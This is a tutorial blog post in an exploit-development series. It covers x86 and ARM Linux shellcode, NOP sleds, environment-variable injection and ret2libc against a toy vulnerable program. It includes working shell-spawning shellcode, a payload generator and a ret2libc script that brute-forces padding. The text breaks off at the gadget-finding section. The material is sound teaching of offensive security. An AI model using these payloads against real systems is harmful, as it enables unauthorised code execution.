Introduction to exploit development - Part 3: Shellcode

Nov 2, 2025

#security #exploit-development #systems #x86 #ARM #shellcode #assembly #linux

Overview

In Part 2, we learned how stack-based buffer overflows enable control flow hijacking by corrupting saved return addresses. We demonstrated redirecting execution to existing functions in the target program. While interesting, this really is limiting, as we can only jump to code that already exists in the program.

The next step is shellcode: custom machine instructions injected into a vulnerable program's memory and executed to achieve arbitrary code execution. This post explores shellcode development for both x86 and ARM architectures, covering:

Assembly fundamentals and system call interfaces
Writing position-independent shellcode that spawns shells
Eliminating null bytes that terminate string operations
NOP sled technique for reliable exploitation
Return-Oriented Programming (ROP) when the stack is non-executable
Testing and debugging shellcode effectively

All x86 work below uses the Debian i386 VM, while ARM work uses the Debian armhf VM or Raspberry Pi configured in Part 1.

A bit or two of assembly

Before writing shellcode, we review basic assembly for both architectures by implementing a simple "Hello, World!" program that uses system calls directly.

x86 hello world

hello.s (x86 AT&T syntax):

.section .data
msg:
    .ascii "Hello, World!\n"
    msg_len = . - msg

.section .text
.globl _start

_start:
    # write(1, msg, msg_len)
    movl $4, %eax          # syscall number for write
    movl $1, %ebx          # file descriptor 1 (stdout)
    leal msg, %ecx         # pointer to message
    movl $msg_len, %edx    # message length
    int $0x80              # invoke syscall

    # exit(0)
    movl $1, %eax          # syscall number for exit
    xorl %ebx, %ebx        # exit code 0
    int $0x80              # invoke syscall

Assemble, link, and execute:

as hello.s -o hello.o
ld hello.o -o hello
./hello
# Output: Hello, World!

Key concepts:

System calls: On 32-bit x86 Linux, system calls are invoked via int $0x80 interrupt
Calling convention: Syscall number in eax, arguments in ebx, ecx, edx, esi, edi, ebp (in that order)
Return value: Returned in eax

Reference: Linux x86 syscall table

ARM hello world

hello.s (ARM):

.section .data
msg:
    .ascii "Hello, World!\n"
    .set msg_len, . - msg

.section .text
.globl _start

_start:
    # write(1, msg, msg_len)
    mov r7, #4             @ syscall number for write
    mov r0, #1             @ file descriptor 1 (stdout)
    ldr r1, =msg           @ pointer to message
    ldr r2, =msg_len       @ message length
    svc #0                 @ invoke syscall (supervisor call)

    # exit(0)
    mov r7, #1             @ syscall number for exit
    mov r0, #0             @ exit code 0
    svc #0                 @ invoke syscall

Assemble, link, and execute:

as hello.s -o hello.o
ld hello.o -o hello
./hello
# Output: Hello, World!

Key concepts:

System calls: On ARM Linux, system calls are invoked via svc #0 (supervisor call, formerly swi)
Calling convention: Syscall number in r7, arguments in r0, r1, r2, r3, r4, r5, r6 (in that order)
Return value: Returned in r0

Reference: Linux ARM syscall table

These examples demonstrate the fundamental differences between x86 and ARM assembly and their system call interfaces, details we must account for when writing our shellcode in the following sections.

Testing shellcode

Before developing shellcode, we need a way to test it. Originally, I used a C program to help with this (based off of code from Hacking by Jon Erickson), but later created a more flexible Python script to speed things up. I've included both below:

C shellcode test harness

shellcode.c

#include <stdio.h>

// Replace with your shellcode bytes
unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    "\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void) {
    printf("Shellcode length: %lu bytes\n", sizeof(shellcode) - 1);

    // Cast shellcode array to function pointer and execute
    void (*execute_shellcode)() = (void(*)())shellcode;
    execute_shellcode();

    return 0;
}

Compile with executable stack:

gcc shellcode.c -z execstack -o shellcode
./shellcode

This approach is simple but requires recompilation for each shellcode test. The executable stack flag (-z execstack) is required to allow code execution from the data segment where our shellcode array resides.

Python shellcode test harness

A more flexible approach is using Python's ctypes library to manipulate memory protection and execute shellcode directly. This is shown via the test_shellcode method in the shellcode.py script below. This script also includes some useful helper functions that we'll use later, you can ignore them for now.

shellcode.py

#!/usr/bin/env python3
import argparse
import ctypes
import subprocess
from pathlib import Path


def string_to_little_endian_hex(data):
    """
    Convert a string or bytes object to little endian hex representation.

    Example: string_to_little_endian_hex("/bin") -> 0x6e69622f

    Args:
        data: String or bytes to convert to hex
    """
    # Encode string to bytes if needed
    if isinstance(data, str):
        data = data.encode("ascii")

    # Convert to hex and reverse byte order for little endian
    hex_bytes = [data.hex()[i : i + 2] for i in range(0, len(data.hex()), 2)]
    little_endian = "".join(reversed(hex_bytes))
    print(f"0x{little_endian}")


def print_shellcode(executable_name, bytes_only=False):
    """
    Extract shellcode opcodes from an assembled and linked executable.

    IMPORTANT: Link your executable with the -N flag:
        ld your_program.o -N -o your_program

    Args:
        executable_name: Name of the executable to extract opcodes from
        bytes_only: If True, print only the hex bytes (compatible with test command)
    """
    binary_file = Path(f"{executable_name}.bin")

    # Create binary file using objcopy
    result = subprocess.call(["objcopy", "-O", "binary", executable_name, str(binary_file)])
    if result != 0:
        print("Could not create binary file. Please assemble and link your code first")
        return

    # Read binary data and format as shellcode
    binary_data = binary_file.read_bytes()

    if bytes_only:
        # Print hex bytes only (no 0x prefix, no \x separators)
        print("".join(f"{byte:02x}" for byte in binary_data))
    else:
        # Print with length and \x format
        shellcode = "".join(f"\\x{byte:02x}" for byte in binary_data)
        print(f"Shellcode for {executable_name} has length: {len(binary_data)}\n{shellcode}")

    # Clean up temporary file
    binary_file.unlink()


def test_shellcode(shellcode_bytes):
    """
    Create an executable function from shellcode bytes.

    Marks memory pages as executable and returns a callable function pointer.

    Args:
        shellcode_bytes: Bytes object containing assembly opcodes

    Returns:
        Callable function that executes the shellcode
    """
    # Create C buffer and cast to function pointer
    shellcode = ctypes.create_string_buffer(shellcode_bytes)
    function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))

    # Get function address and libc instance
    addr = ctypes.cast(function, ctypes.c_void_p).value
    libc = ctypes.CDLL("libc.so.6")
    pagesize = libc.getpagesize()

    # Calculate page-aligned starting address
    addr_page = (addr // pagesize) * pagesize

    # Mark all pages containing shellcode as executable (READ|WRITE|EXEC)
    for page_start in range(addr_page, addr + len(shellcode_bytes), pagesize):
        assert libc.mprotect(page_start, pagesize, 0x7) == 0

    return function


if __name__ == "__main__":
    p = argparse.ArgumentParser(description="Shellcode utilities")
    sp = p.add_subparsers(dest="cmd", required=True)
    sp.add_parser("hex", help="Convert string to little-endian hex").add_argument("data")
    print_parser = sp.add_parser("print", help="Extract shellcode from executable")
    print_parser.add_argument("exe")
    print_parser.add_argument("-b", "--bytes", action="store_true", help="Print only hex bytes (compatible with test command)")
    sp.add_parser("test", help="Execute shellcode").add_argument("bytes", help="Hex string (e.g., 31c050)")
    args = p.parse_args()

    if args.cmd == "hex":
        string_to_little_endian_hex(args.data)
    elif args.cmd == "print":
        print_shellcode(args.exe, bytes_only=args.bytes)
    elif args.cmd == "test":
        test_shellcode(bytes.fromhex(args.bytes))()

This script uses mprotect() to mark the memory page containing our shellcode as executable, eliminating the need for -z execstack. This is more representative of real-world exploitation where we mark specific memory regions executable rather than the entire stack.

Writing shellcode: x86

Shellcode development follows a process:

Identify the goal (e.g., spawn a shell)
Determine required system calls
Write assembly that achieves the goal
Eliminate problematic bytes (null bytes, newlines, etc.)
Extract opcodes and test

Our goal in this series will always be to spawn a /bin/sh shell using the execve() system call.

Understanding execve()

The execve() system call replaces the current process with a new program:

int execve(const char *pathname, char *const argv[], char *const envp[]);

To spawn a shell:

pathname: pointer to string "/bin/sh"
argv: array containing ["/bin/sh", NULL]
envp: can be NULL

On x86:

Syscall number: 11 (0xb)
Arguments: ebx = pathname, ecx = argv, edx = envp

First attempt: bad_shell.s (x86)

bad_shell.s

.data
    shell: .ascii "/bin/shX"

.text
.global _start
_start:
    ### char *shell[] = {"/bin/sh", NULL}; ###
    ### execve("shell[0], shell, NULL); ###
    mov $11, %eax       # Store syscall for execve (11) in %eax
    mov $shell, %ebx    # Store string of executable we want to execute in %ebx
    movb $0, 7(%ebx)    # Overwrite the last byte (X) in %ebx to be NULL
    mov $0, %ecx        # Store NULL in %ecx
    int $0x80           # Interrupt to make the syscall

    ### exit(0); ###
    movl $1, %eax   # Store syscall for exit (1) in %eax
    movl $0, %ebx   # Store the exit value we want to return in %ebx
    int $0x80       # Interrupt to make the syscall

Assemble, link, and test:

as bad_shell.s -o bad_shell.o
ld bad_shell.o -o bad_shell
./bad_shell
# Should spawn a shell

This works, but let's examine the opcodes.

Using objdump:

# objdump -d bad_shell

bad_shell:     file format elf32-i386

Disassembly of section .text:

08049000 <_start>:
 8049000:	b8 0b 00 00 00       	mov    $0xb,%eax
 8049005:	bb 00 a0 04 08       	mov    $0x804a000,%ebx
 804900a:	c6 43 07 00          	movb   $0x0,0x7(%ebx)
 804900e:	b9 00 00 00 00       	mov    $0x0,%ecx
 8049013:	cd 80                	int    $0x80
 8049015:	b8 01 00 00 00       	mov    $0x1,%eax
 804901a:	bb 00 00 00 00       	mov    $0x0,%ebx
 804901f:	cd 80                	int    $0x80

Using shellcode.py:

# ./shellcode.py print bad_shell
Shellcode for bad_shell has length: 41
\xb8\x0b\x00\x00\x00\xbb\x75\x80\x04\x08\xc6\x43\x07\x00\xb9\x00\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\x2f\x62\x69\x6e\x2f\x73\x68\x58

The disassembly reveals a whopping 16 null bytes (\x00). Null bytes terminate string operations in C (like strcpy(), gets(), etc.), preventing our shellcode from being fully copied into memory. They gotta go.

Eliminating null bytes: good_shell.s (x86)

To get rid of null bytes, we can apply some of the following techniques:

XOR for zeroing: Instead of mov $0, %eax, use xor %eax, %eax
Push strings onto stack: Instead of referencing the data segment, construct strings on the stack at runtime
Clever arithmetic: Build values through arithmetic instead of direct assignment

Let's see an example of this:

good_shell.s

.text
.global _start
_start:
    ### execve("/bin/sh", ["/bin/sh", NULL], NULL); ###
    xor %eax, %eax      # XOR %eax with itself, zeroing it out
    push %eax           # Push %eax (NULL) onto the stack
    push $0x68732f2f    # Push "//sh" onto the stack
    push $0x6e69622f    # Push "/bin" onto the stack, %esp now points to it
    mov %esp, %ebx      # %ebx now holds the starting address of "/bin//sh"
    push %eax           # Push %eax (NULL) onto the stack
    push %ebx           # Push %ebx ("/bin//sh\0") onto the stack, %esp now points to it
    mov %esp, %ecx      # %ecx now holds starting address of ["/bin//sh", NULL]
    xor %edx, %edx      # XOR %edx with itself, zeroing it out
    mov $11, %al        # Store syscall for execve (11) in %eax, via %al
    int $0x80           # Interrupt to make the syscall


    ### exit(0); ###
    xor %eax, %eax      # XOR %eax with itself, zeroing it out
    mov $1, %al         # Store syscall for exit (1) in %eax, via %al
    xor %ebx, %ebx      # Store the exit value we want to return in %ebx by XORing it to get 0
    int $0x80           # Interrupt to make the syscall

Assemble:

as good_shell.s -o good_shell.o
ld good_shell.o -o good_shell

Extract the opcodes and check for null bytes (again, you can use objdump, or the print option from the shellcode.py script given earlier):

./shellcode.py print good_shell

As you'll see, no null bytes!

Final x86 shellcode (33 bytes):

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80

Test this shellcode using the Python shellcode.py script given earlier:

./shellcode.py test $(./shellcode.py print -b good_shell)
# Should spawn a shell

Writing shellcode: ARM

ARM has some obvious differences compared to x86, namely:

Different instruction encoding and addressing modes
Thumb mode (16-bit instructions) can reduce null bytes
Branch instructions for mode switching

First attempt: bad_shell.s (ARM)

bad_shell.s

.syntax unified

.data
    shell: .ascii "/bin/sh\0"

.text
.global _start

_start:
    .code 32
    @@@ execve("/bin/sh", 0, 0); @@@
    ldr r0, shell_addr  @ Load executable we want to execute in r0
    mov r1, 0           @ Store NULL in r1
    mov r2, 0           @ Store NULL in r2
    mov r7, 11          @ Store the sycall for execve (11) in r7
    swi 0               @ Software interrupt to make the syscall

    @@@ exit(0); @@@
    mov r0, 0           @ Store the exit value we want to return in r0
    mov r7, 1           @ Store the sycall for exit (1) in r7
    swi 0               @ Software interrupt to make the syscall

shell_addr:
    .word shell

Assemble and test:

as bad_shell.s -o bad_shell.o
ld bad_shell.o -o bad_shell
./bad_shell

Check for null bytes:

./shellcode.py print bad_shell
Shellcode for bad_shell has length: 44
\x18\x00\x9f\xe5\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x78\x00\x01\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00

We find 14 null bytes. Time to get creative.

Eliminating null bytes: good_shell.s (ARM)

For better ARM shellcode, we'll apply several techniques (some of which are similar to what we did for x86):

Switch to Thumb mode: Use 16-bit instructions to reduce null bytes
Program-relative addressing: Used to load string addresses
XOR for zeroing: Use eor (exclusive OR) to zero registers instead of direct assignment
Writeable .text section: We'll store string data in the .text section and use relative addressing, however, note that this will require a writable text segment (via -N linker flag) to test

good_shell.s

.section .text
.global _start

_start:
    .code 32
    add r3, pc, #1      @ Add 1 to PC register and add it to r3
    bx r3               @ Branch and exchange to switch to Thumb mode (LSB = 1)

    .code 16
    @@@ execve("/bin/sh", NULL, NULL); @@@
    add r0, pc, #8      @ Use program-relative adressing to load our string into r0
    eor r1, r1, r1      @ XOR r1 with itself, zeroing it out
    eor r2, r2, r2      @ XOR r2 with itself, zeroing it out
    strb r2, [r0, #7]   @ Overwrite the last byte of "/bin/shX" with 0 (NULL)
    mov r7, #11         @ Store syscall for execve (11) in r7
    svc #1              @ Interrupt to make a supervisor call

.ascii "/bin/shX"

Assemble with writable text section:

as good_shell.s -o good_shell.o
ld good_shell.o -o -N good_shell  # -N makes text segment writable
./good_shell

Extract the opcodes and check for null bytes

./shellcode.py print good_shell

Final ARM shellcode (28 bytes):

\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58

Test this shellcode using the Python shellcode.py script given earlier:

./shellcode.py test $(./shellcode.py print -b good_shell)
# Should spawn a shell

Exploiting

Now that we have working shellcode, we face a problem: how do we actually get a vulnerable program to execute it? In Part 2, we exploited buffer overflows by redirecting the saved return address to existing functions. But now we want to inject our custom shellcode into memory and execute it.

The challenge is that we need to know the exact memory address where our shellcode resides. If we overwrite the return address with the wrong value, the program crashes instead of executing our shellcode. This is tricky because:

Stack addresses vary based on environment variables, command-line arguments, and program state
We rarely have perfect information about where our injected data ends up
Even small miscalculations cause crashes instead of exploitation

The so-called NOP sled technique solves this problem by making exploitation more reliable when we don't know the exact address where our shellcode will land in memory.

NOP sleds

A NOP sled is a sequence of NOP (No Operation) instructions preceding our shellcode. When the program jumps into the NOP sled, execution "slides" through the NOPs until reaching our shellcode.

Why this helps: When exploiting real programs, we often don't know the exact stack address where our shellcode begins. Environment variables, command-line arguments, and ASLR (when enabled) affect stack layout. A large NOP sled means we only need to jump somewhere in the sled - any address within hundreds of bytes works.

NOP opcodes:

x86: \x90 (one byte, simple)
ARM: More complex - ARM doesn't have single-byte NOPs. Common alternatives:
- mov r1, r1 (four bytes: \x01\x10\xa0\xe1)
- Must be 4-byte aligned for ARM execution mode

Environment variable injection

Instead of injecting shellcode directly into the vulnerable buffer (which may be too small), we store shellcode in an environment variable and redirect execution to that address.

Export shellcode to environment:

Example on x86:

export SHELLCODE=$(python3 -c 'print("\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80")')

This creates an environment variable with 1000 NOP instructions followed by our shellcode.

Now we need the memory address of this environment variable, one way to get this is to use the following helper program (credit goes to Hacking by Jon Erickson):

getenv_addr.c

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char *ptr;

    if(argc < 2) {
        printf("Usage: %s <environment variable name>\n", argv[0]);
        return 1;
    }

    ptr = getenv(argv[1]);
    printf("%s is at address: %p\n", argv[1], ptr);

    return 0;
}

Compile and use:

gcc getenv_addr.c -o getenv_addr
./getenv_addr SHELLCODE
# Output: SHELLCODE is at address: 0xbeffef55 (example address)

Important: The address will vary slightly between programs due to environment differences. For exploitation, we can just estimate an address in the middle of our NOP sled.

Creating a payload generator

Rather than manually crafting payloads with inline Python, let's use a helper script that consolidates our exploit primitives. The nop.py script given below provides three subcommands:

shellcode: Generate a NOP sled followed by architecture-specific shellcode
buffer: Generate a buffer filled with an environment variable's address (for overwriting return addresses)
debug: Generate an alphabetic pattern for identifying offsets

nop.py

#!/usr/bin/env python3
import argparse
import ctypes
import sys
import os

X86_SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53"
    b"\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80"
)

ARM_SHELLCODE = (
    b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71"
    b"\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58"
)


def hex_string_to_little_endian_bytes(hex_string):
    """Convert a hex string to little endian bytes."""
    hex_bytes = [int(hex_string[i : i + 2], 16) for i in range(0, len(hex_string), 2)]
    return bytes(reversed(hex_bytes))


def print_env_buffer(var_name, target_path, buf_size):
    """
    Print a buffer containing the address of an environment variable.

    The function accounts for the difference in program name length between
    this script and the target executable, then adds an offset to land inside
    the NOP sled rather than at its start.
    """
    if isinstance(var_name, str):
        var_name = var_name.encode("ascii")

    libc = ctypes.CDLL("libc.so.6")
    get_env = libc.getenv
    get_env.restype = ctypes.c_void_p

    # Program name affects env var memory location - each extra character
    # shifts the address. Calculate the difference between this script's
    # invocation name and the target program name.
    script_name = sys.argv[0]
    name_diff = len(script_name) - len(target_path)
    # Each character difference shifts the address by 1 byte on the stack.
    # Add 500 to land in the middle of a typical 1000-byte NOP sled.
    env_addr = get_env(var_name) - name_diff + 500
    hex_addr = f"{env_addr:08x}"

    sys.stdout.buffer.write(
        hex_string_to_little_endian_bytes(hex_addr) * (buf_size // 2)
    )

def warn_small_nop_sled(size):
    """Print a warning if NOP sled size is less than 1000 bytes."""
    if size < 1000:
        print(
            f"Warning: NOP sled size {size} is less than 1000 bytes. "
            f"The 'env' subcommand assumes a 1000-byte sled (offset +500). "
            f"Consider using a larger sled or adjusting the offset.",
            file=sys.stderr,
        )

def print_debug_buffer(buf_size):
    """
        Print a buffer with repeating alphabet characters (AAAABBBBCCCC...).
        If the given buf_size is larger than 104 (26 * 4), then the entire
        returned buffer is prepended by (buf_size - 104) '@' (ASCII 0x40) characters.
    """
    char_buff = "".join(chr(c) * 4 for c in range(ord("A"), ord("Z") + 1))

    if len(char_buff) > buf_size:
        print(char_buff[:buf_size])
    else:
        print("@" * (buf_size - len(char_buff)) + char_buff)


def print_shellcode(buf_size, arch):
    """Print a NOP sled followed by shellcode."""
    if arch == "x86":
        nop_sled = b"\x90" * buf_size
        shellcode = X86_SHELLCODE
    else:
        # ARM NOP instruction (mov r1, r1)
        nop_sled = b"\x01\x10\xa0\xe1" * (buf_size // 4)
        shellcode = ARM_SHELLCODE

    sys.stdout.buffer.write(nop_sled + shellcode)


if __name__ == "__main__":
    p = argparse.ArgumentParser(description="Exploit payload generator")
    sp = p.add_subparsers(dest="cmd", required=True)

    shellcode_parser = sp.add_parser("shellcode", help="Print NOP sled + shellcode")
    shellcode_parser.add_argument("size", type=int, help="Size of NOP sled")
    shellcode_parser.add_argument(
        "-a", "--arch", choices=["x86", "arm"], default="x86",
        help="Target architecture",
    )

    buf_parser = sp.add_parser("buffer", help="Print buffer with env var address")
    buf_parser.add_argument("var", help="Environment variable name")
    buf_parser.add_argument("target", help="Path to target executable")
    buf_parser.add_argument("size", type=int, help="Buffer size")

    debug_parser = sp.add_parser("debug", help="Print alphabetic debug buffer")
    debug_parser.add_argument("size", type=int, help="Buffer size")

    args = p.parse_args()

    if args.cmd == "shellcode":
        warn_small_nop_sled(args.size)
        print_shellcode(args.size, args.arch)
    elif args.cmd == "buffer":
        print_env_buffer(args.var, args.target, args.size)
    elif args.cmd == "debug":
        print_debug_buffer(args.size)

An interesting thing to take note of is the fancy footwork in print_env_buffer(). Environment variable addresses shift based on the program name length, so this script compensates for this difference and adds an offset to land in the middle of the NOP sled rather than guessing manually.

Exploiting victim.c using NOP sleds

Consider a simple vulnerable program:

victim.c

#include <string.h>

void vulnerable(char *input) {
    char buffer[100];
    strcpy(buffer, input);  // No bounds checking
}

int main(int argc, char *argv[]) {
    if(argc < 2) return 1;
    vulnerable(argv[1]);
    return 0;
}

Compile:

# x86
gcc -m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 \
    victim.c -o victim

# ARM
gcc -fno-stack-protector -z execstack victim.c -o victim

Now, to actually start exploiting we can follow a general set of steps:

Export NOP sled + shellcode to an environment variable
Determine or guess the exploitable buffer (padding) length
Create the injection payload, including the padding to overwrite the return address + address pointing to NOP sled
Execute victim with payload

For ARM, there are a few extra considerations to make, as discussed in the next section. But for now, let's focus on x86.

First, determine the padding needed to reach the saved return address. The debug subcommand generates an alphabetic pattern (@@@@@@AAAABBBBCCCC...) that helps identify exact offsets:

gdb -batch -ex "run $(./nop.py debug 120)" -ex "info registers eip" ./victim
# eip            0x58585858  0x58585858

The value 0x58585858 is ASCII for "XXXX", meaning EIP was overwritten by the X's in this case. Since the pattern repeats each letter 4 times (AAAA=0, BBBB=4, ..., XXXX=92), and 16 (120 - 104) @'s prepended because we specified a buffer size of 120, we need 16 + 92 = 108 bytes to reach and overwrite the return address. Note, since we want the last 4 bytes to be the address into our NOP sled, our padding should be 104 bytes.

Now export our shellcode with a 1000-byte NOP sled:

export SHELLCODE=$(./nop.py shellcode -a x86 1000)

Finally, exploit the vulnerable program. The buffer subcommand generates a buffer filled with the calculated address of our environment variable:

./victim $(./nop.py buffer SHELLCODE ./victim 240)
# Should spawn a shell

Victim has been pwned!! But wait, what just happened?

The buffer subcommand did the following:

Looked up the SHELLCODE environment variable address
Adjusted for the program name length difference between nop.py and ./victim
Added an offset to land inside the NOP sled (not at the exact start)
Generated 240 bytes of this address repeated
- Note how this buffer is much bigger than our precise finding of 108 bytes! That whole process of using GDB to find the exact buffer/padding length was just for fun, we didn't actually need such precision (because our buffer just repeated the target address repeatedly)

When executed, the overwritten return address points into our NOP sled in the environment variable. Execution slides through NOPs and hits our shellcode, spawning a shell.

ARM NOP sled alignment complications

ARM NOP sleds must be handled a bit differently due to:

4-byte alignment requirement: ARM instructions must be 4-byte aligned in ARM mode
Multi-byte NOP instructions: No single-byte NOP exists
Address alignment: The environment variable address must also be 4-byte aligned (divisible by 4)

Using nop.py for ARM:

Use nop.py to generate an appropriate ARM NOP sled using the --arch arm flag and store it in an env variable:

export SHELLCODE=$(./nop.py shellcode -a arm 1000)

This generates 1000 bytes of ARM NOP instructions (mov r1, r1 - encoded as \x01\x10\xa0\xe1) followed by the ARM shellcode. Note that the NOP sled size should be divisible by 4 since each ARM NOP is 4 bytes.

Critical alignment issue: The environment variable address must be 4-byte aligned (divisible by 4). Use getenv_addr to check:

./getenv_addr SHELLCODE
# Output: 0xbefffd3a (example - NOT divisible by 4)

If the address is NOT divisible by 4, export additional environment variables to shift addresses:

export DUMMY="AA"
./getenv_addr SHELLCODE
# Output: 0xbefffd3c (NOW divisible by 4!)

This manipulation shifts environment variable addresses until alignment is achieved. Only then can we successfully exploit ARM targets with NOP sleds.

Once aligned, exploit as before:

./victim $(./nop.py buffer SHELLCODE ./victim 240)

Note, that the environment variable addresses will be different inside victim commpared to your shell. If you run into BUS ERROR or segmentation errors, try adding additional A's to your DUMMY environment variable and retrying, it'll work after a few retries - trust me!

Return-Oriented Programming (ROP)

NOP sleds require an executable stack (-z execstack compiler flag). Modern systems enable the NX (No-eXecute) bit by default, marking the stack as non-executable. When we attempt to execute shellcode from the stack, the program crashes with a segmentation fault.

Return-Oriented Programming (ROP) bypasses this protection by reusing existing executable code in the program and linked libraries. Instead of injecting new code, we chain together short instruction sequences (called gadgets) ending in ret instructions, controlling the sequence via stack manipulation.

ROP fundamentals

The basic idea:

Overwrite saved return addresses with an address of a gadget in executable memory (like libc)
The gadget then executes and returns (via ret) to the next address on the stack
We control the stack, so we control the sequence of gadgets executed
Chain gadgets to achieve desired behavior (e.g., calling system("/bin/sh"))

For Linux exploitation, this is often called ret2libc (return-to-libc) when specifically targeting libc functions.

ret2libc on x86

Instead of executing shellcode, we call system("/bin/sh") from libc. The system() function executes shell commands, so passing "/bin/sh" spawns a shell.

Required elements:

Address of system() in libc
Address of exit() in libc (for clean exit after shell exits)
Address of string "/bin/sh" (can be in an environment variable, but it also conveniently exists in libc itself)

Stack layout for ret2libc:

[padding to overflow]
[address of system()]
[address of exit()]
[address of "/bin/sh" string]

When the vulnerable function returns:

Pops system() address into EIP, begins executing system()
system() reads its return address (sees exit()) and argument (sees "/bin/sh")
system("/bin/sh") executes, spawning a shell
When shell exits, execution continues to exit(), cleanly terminating

Finding addresses manually with GDB:

gcc -m32 -fno-stack-protector -mpreferred-stack-boundary=2 victim.c -o victim
gdb ./victim
(gdb) break main
(gdb) run
(gdb) print system
# $1 = {<text variable, no debug info>} 0xb7de2920 <system>
(gdb) print exit
# $2 = {<text variable, no debug info>} 0xb7dd1d60 <exit>
(gdb) quit

For the "/bin/sh" string, we can find it directly in libc rather than using an environment variable:

# Find libc path
ldd ./victim | grep libc
# libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7d96000)

# Search for "/bin/sh" string in libc
grep -boa "/bin/sh" /lib/i386-linux-gnu/libc.so.6
# 1234567:/bin/sh

The string offset plus the libc base address gives us the runtime address.

Creating a manual exploit:

#!/usr/bin/env python3
import struct
import subprocess

# Addresses from GDB
system_addr = 0xb7de2920
exit_addr = 0xb7dd1d60
binsh_addr = 0xb7e12345  # libc base + "/bin/sh" offset

# Build payload
padding = b"A" * 112  # Padding to reach return address
rop_chain = struct.pack("<I", system_addr)
rop_chain += struct.pack("<I", exit_addr)
rop_chain += struct.pack("<I", binsh_addr)

payload = padding + rop_chain

subprocess.call(["./victim", payload])

Automating ret2libc with rop.py

Manually finding all these addresses is tedious. Instead, let's create a script to automates the entire process:

rop.py

#!/usr/bin/env python3
import argparse
import re
from subprocess import call, check_output


def to_le32(val):
    """Convert integer to 4-byte little-endian."""
    return val.to_bytes(4, "little")


def get_libc_info(target):
    """Get libc path and runtime base address."""
    # Find libc path
    ldd = check_output(["ldd", target]).decode()
    libc_path = re.search(r"libc\.so\.6 => (\S+)", ldd).group(1)

    # Get symbol offsets from libc
    nm = check_output(["nm", "-D", libc_path]).decode()
    system_off = int(re.search(r"([0-9a-f]+) . system", nm).group(1), 16)
    exit_off = int(re.search(r"([0-9a-f]+) . \bexit\b", nm).group(1), 16)

    # Get runtime address via GDB to calculate base
    gdb = check_output(
        ["gdb", target, "-batch", "-ex", "b main", "-ex", "r", "-ex", "p system"]
    ).decode()
    system_addr = int(re.findall(r"0x([0-9a-fA-F]+)", gdb)[-1], 16)
    libc_base = system_addr - system_off

    # Find /bin/sh string offset
    binsh_off = int(check_output(["grep", "-boa", "/bin/sh", libc_path]).split(b":")[0])

    return {
        "path": libc_path,
        "base": libc_base,
        "system": libc_base + system_off,
        "exit": libc_base + exit_off,
        "binsh": libc_base + binsh_off,
    }


def build_x86_chain(libc):
    """
    x86 ret2libc: arguments on stack.
    Stack after overflow: [system][exit][&"/bin/sh"]
    """
    return to_le32(libc["system"]) + to_le32(libc["exit"]) + to_le32(libc["binsh"])

def build_arm_chain(target, libc):
    pass # Implemented later in the post

if __name__ == "__main__":
    p = argparse.ArgumentParser(description="ret2libc exploit for x86 and ARM")
    p.add_argument("target", help="Vulnerable binary")
    p.add_argument("-s", "--start", type=int, default=100, help="Min padding")
    p.add_argument("-e", "--end", type=int, default=130, help="Max padding")
    p.add_argument("-a", "--arch", choices=["x86", "arm"], required=True)
    args = p.parse_args()

    libc = get_libc_info(args.target)

    if args.arch == "arm":
        chain = build_arm_chain(args.target, libc)
    else:
        chain = build_x86_chain(libc)

    for padding in range(args.start, args.end):
        call([args.target, b"A" * padding + chain])

This script performs a handful of handy things:

Finds libc path: Uses ldd to locate the linked libc library
Extracts symbol offsets: Uses nm -D to get system() and exit() offsets from libc
Calculates runtime base: Runs GDB to get the actual system() address at runtime, then subtracts the offset to find the libc base address
Locates "/bin/sh": Uses grep -boa to find the string offset within libc
Builds the ROP chain: Constructs the payload with proper little-endian addresses
Bruteforces padding: Tries different buffer sizes to find the correct overflow offset

Using rop.py for x86:

First compile the target without the executable stack flag:

gcc -m32 -fno-stack-protector -mpreferred-stack-boundary=2 victim.c -o victim

Then run the exploit:

./rop.py ./victim -a x86 -s 100 -e 130

The script will try padding lengths from 100 to 130 bytes. When it hits the correct offset, you'll get a shell - without ever executing code from the stack! Not really practical for real hacking, but definitely a time saver!

ret2libc on ARM

ARM ret2libc is significantly more complex because arguments are passed in registers (r0, r1, r2, etc.), not on the stack like x86.

We can't simply overflow with function addresses and arguments. We need ROP gadgets that:

Pop values from the stack into registers
Then jump to our target function

The POP instruction as a gadget:

At first glance, POP seems uninteresting. But consider what pop {r0, r4, pc} actually does:

ldr r0, [sp], #4   ; load from stack into r0, increment sp
ldr r4, [sp], #4   ; load from stack into r4, increment sp
ldr pc, [sp], #4   ; load from stack into pc, increment sp

This loads values from the stack into registers - exactly what we need! If we overflow the stack with:

Gadget address	r0	r4	pc
`pop {r0, r4, pc}`	"/bin/sh"	dummy	system()

The gadget will pop our controlled values into registers, with r0 containing our argument and pc jumping to system().

Finding gadgets in libc:

